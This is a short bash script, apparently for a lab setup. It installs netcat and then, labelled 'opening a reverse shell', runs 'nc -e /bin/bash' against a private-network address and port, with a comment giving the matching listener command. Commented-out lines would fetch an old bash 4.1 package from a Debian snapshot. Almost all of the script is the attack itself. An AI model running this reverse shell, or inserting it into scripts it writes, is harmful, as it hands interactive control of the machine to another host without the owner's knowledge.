#!/bin/bash

apt-get update

# apt-get install -y wget

# wget https://snapshot.debian.org/archive/debian/20140304T040604Z/pool/main/b/bash/bash_4.1-3_amd64.deb

# dpkg -i bash_4.1-3_amd64.deb
# sleep 10

apt-get install -y netcat

echo "sleep 20"
sleep 20

echo "opening a reverse shell"
nc -e /bin/bash 192.168.0.109 1234

# For listening: nc -l 1234